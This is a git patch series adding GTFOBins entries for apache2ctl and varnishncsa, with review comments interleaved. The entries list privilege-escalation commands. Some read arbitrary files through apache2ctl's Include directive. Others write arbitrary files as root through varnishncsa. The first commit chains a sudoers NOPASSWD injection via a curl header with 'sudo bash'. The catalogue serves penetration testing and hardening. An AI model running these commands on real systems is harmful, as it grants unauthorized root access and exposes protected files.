From 2c9f0de8e5e23380671f6b46bcc5350dac81c464 Mon Sep 17 00:00:00 2001
From: nuts7
Date: Mon, 19 Jun 2023 10:59:59 +0200
Subject: [PATCH 1/5] Add varnishncsa & apache2ctl

This commit adds 2 files (_gtfobins/apache2ctl.md and _gtfobins/varnishncsa.md) containing privilege escalation methods for the varnishncsa and apache2ctl utilities.
---
 _gtfobins/apache2ctl.md | 16 ++++++++++++++++
 _gtfobins/varnishncsa.md | 8 ++++++++
 2 files changed, 24 insertions(+)
 create mode 100644 _gtfobins/apache2ctl.md
 create mode 100644 _gtfobins/varnishncsa.md

diff --git a/_gtfobins/apache2ctl.md b/_gtfobins/apache2ctl.md
new file mode 100644
index 00000000..14237106
--- /dev/null
+++ b/_gtfobins/apache2ctl.md
@@ -0,0 +1,16 @@
+---
+description: apache2ctl is a front end to the Apache HyperText Transfer Protocol (HTTP) server. It is designed to help the administrator control the functioning of the Apache apache2 daemon.
+functions:
+ file-read:
+ - code: cp -r /etc/apache2/ /tmp/apache2
+ - code: |
+ LFILE=file_to_read
+ echo "Include $LFILE" >> /tmp/apache2/apache2.conf
+ - code: apache2ctl -d /tmp/apache2 -k restart
+ sudo:
+ - code: cp -r /etc/apache2/ /tmp/apache2
+ - code: |
+ LFILE=file_to_read
+ echo "Include $LFILE" >> /tmp/apache2/apache2.conf
+ - code: sudo apache2ctl -d /tmp/apache2 -k restart
+---
diff --git a/_gtfobins/varnishncsa.md b/_gtfobins/varnishncsa.md
new file mode 100644
index 00000000..65cbbc84
--- /dev/null
+++ b/_gtfobins/varnishncsa.md
@@ -0,0 +1,8 @@
+---
+description: varnishncsa utility reads varnishd shared memory Varnish logs and presents them in the Apache / NCSA "combined" log format.
+functions:
+ sudo:
+ - code: sudo varnishncsa -g request -q "ReqURL ~ \"/exploit_randomfoo\"" -F '%{exploit}i' -w /etc/sudoers.d/user &
+ - code: curl -H 'exploit: user ALL = (ALL) NOPASSWD: ALL' localhost:6081/exploit_randomfoo
+ - code: sudo bash
+---
\ No newline at end of file
From 0190295ed22c7862dae77d719d38af084dd10361 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sat, 23 Dec 2023 12:13:45 +0100
Subject: [PATCH 2/5] Simplify apache2ctl

---
 _gtfobins/apache2ctl.md | 22 +++++++++-------------
 1 file changed, 9 insertions(+), 13 deletions(-)

diff --git a/_gtfobins/apache2ctl.md b/_gtfobins/apache2ctl.md
index 14237106..20280e03 100644
--- a/_gtfobins/apache2ctl.md
+++ b/_gtfobins/apache2ctl.md
@@ -1,16 +1,12 @@
 ---
-description: apache2ctl is a front end to the Apache HyperText Transfer Protocol (HTTP) server. It is designed to help the administrator control the functioning of the Apache apache2 daemon.
+description: This includes the file in the actual configuration file, the first line is leaked as an error message.
 functions:
- file-read:
- - code: cp -r /etc/apache2/ /tmp/apache2
- - code: |
- LFILE=file_to_read
- echo "Include $LFILE" >> /tmp/apache2/apache2.conf
- - code: apache2ctl -d /tmp/apache2 -k restart
- sudo:
- - code: cp -r /etc/apache2/ /tmp/apache2
- - code: |
- LFILE=file_to_read
- echo "Include $LFILE" >> /tmp/apache2/apache2.conf
- - code: sudo apache2ctl -d /tmp/apache2 -k restart
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ apache2ctl -c "Include $LFILE" -k stop
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo apache2ctl -c "Include $LFILE" -k stop
 ---
From efaf1b11e88c7ff27013b1dbeb93e8977045f2e5 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sat, 23 Dec 2023 12:40:09 +0100
Subject: [PATCH 3/5] Polish varnishncsa

---
 _gtfobins/varnishncsa.md | 22 ++++++++++++++++------
 1 file changed, 16 insertions(+), 6 deletions(-)

diff --git a/_gtfobins/varnishncsa.md b/_gtfobins/varnishncsa.md
index 65cbbc84..b86cc11e 100644
--- a/_gtfobins/varnishncsa.md
+++ b/_gtfobins/varnishncsa.md
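Review bot: The new top-level `description` in this hunk describes the file-read technique rather than the `apache2ctl` binary, and the binary description it replaces is dropped entirely, so the page no longer says what the tool is. If the site schema supports a per-entry description (I believe it does, but have not checked the layout), keep a one-line binary description at the top level and put this sentence next to the code it explains, e.g. `- description: This includes the file in the actual configuration file; the first line is leaked as an error message.` followed by the existing `code: |` item under both `file-read` and `sudo`. The comma splice in the sentence also reads better as a semicolon, as quoted. The same top-level placement is used for the varnishncsa description in the following patch of this series.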
@@ -1,8 +1,18 @@
 ---
-description: varnishncsa utility reads varnishd shared memory Varnish logs and presents them in the Apache / NCSA "combined" log format.
+description: |
+ This allows to write arbitrary files as root, provided that the proper HTTP response is made. Specifically the content of a certain header will be written in the file. First start `varnishncsa` as follows, then trigger the file write with:
+
+ ```
+ curl -H 'yyy: DATA' http://localhost:6081/xxx
+ ```
+description:
 functions:
- sudo:
- - code: sudo varnishncsa -g request -q "ReqURL ~ \"/exploit_randomfoo\"" -F '%{exploit}i' -w /etc/sudoers.d/user &
- - code: curl -H 'exploit: user ALL = (ALL) NOPASSWD: ALL' localhost:6081/exploit_randomfoo
- - code: sudo bash
----
\ No newline at end of file
+ sudo:
+ code: |
+ LFILE=file_to_write
+ sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
+ suid:
+ code: |
+ LFILE=file_to_write
+ ./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
+---
From d71410748f870a1101441ca8664060cbc328904e Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sat, 23 Dec 2023 12:42:22 +0100
Subject: [PATCH 4/5] Fix broken YAML in varnishncsa

---
 _gtfobins/varnishncsa.md | 1 -
 1 file changed, 1 deletion(-)

diff --git a/_gtfobins/varnishncsa.md b/_gtfobins/varnishncsa.md
index b86cc11e..e18f122b 100644
--- a/_gtfobins/varnishncsa.md
+++ b/_gtfobins/varnishncsa.md
@@ -5,7 +5,6 @@ description: |
 ```
 curl -H 'yyy: DATA' http://localhost:6081/xxx
 ```
-description:
 functions:
 sudo:
 code: |
From 914c850cec893cfb78e71b509bf636954d7febd7 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sat, 23 Dec 2023 12:43:57 +0100
Subject: [PATCH 5/5] Fix broken YAML in varnishncsa

---
 _gtfobins/varnishncsa.md | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/_gtfobins/varnishncsa.md b/_gtfobins/varnishncsa.md
index e18f122b..1f803ddc 100644
--- a/_gtfobins/varnishncsa.md
+++ b/_gtfobins/varnishncsa.md
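Review bot: The new description says the write is triggered when "the proper HTTP response is made", but everything else in the hunk concerns the request: the `-q 'ReqURL ~ "/xxx"'` query matches the request URL, the `curl -H 'yyy: DATA'` example sends a request header, and `%{yyy}i` is, as far as I recall varnishncsa's format directives, the request-header form (the response-header form being `%{...}o`). I would change the first sentence to `This allows writing arbitrary files as root, provided that a suitable HTTP request is made.` and the second to `Specifically, the content of a chosen request header is written to the file.`. The sentence order could then also say which header name and URL the reader must substitute, since `xxx` and `yyy` appear both in the description and in the `code` items below.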
@@ -7,11 +7,11 @@ description: |
 ```
 functions:
 sudo:
- code: |
- LFILE=file_to_write
- sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
+ - code: |
+ LFILE=file_to_write
+ sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
 suid:
- code: |
- LFILE=file_to_write
- ./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
+ - code: |
+ LFILE=file_to_write
+ ./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
 ---
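Review bot: Now that the entries are well-formed list items, the description above this hunk still does not say that `-w "$LFILE"` replaces the target file's contents rather than appending to it; as far as I recall varnishncsa's man page, the output file is truncated unless the append option (`-a`) is given, so any existing file at that path is lost and a file-integrity monitor would see a full rewrite rather than an appended line. I would add to the description block `Note that the target file is overwritten.` so readers do not assume the earlier content survives. The `description: |` block starts before this hunk.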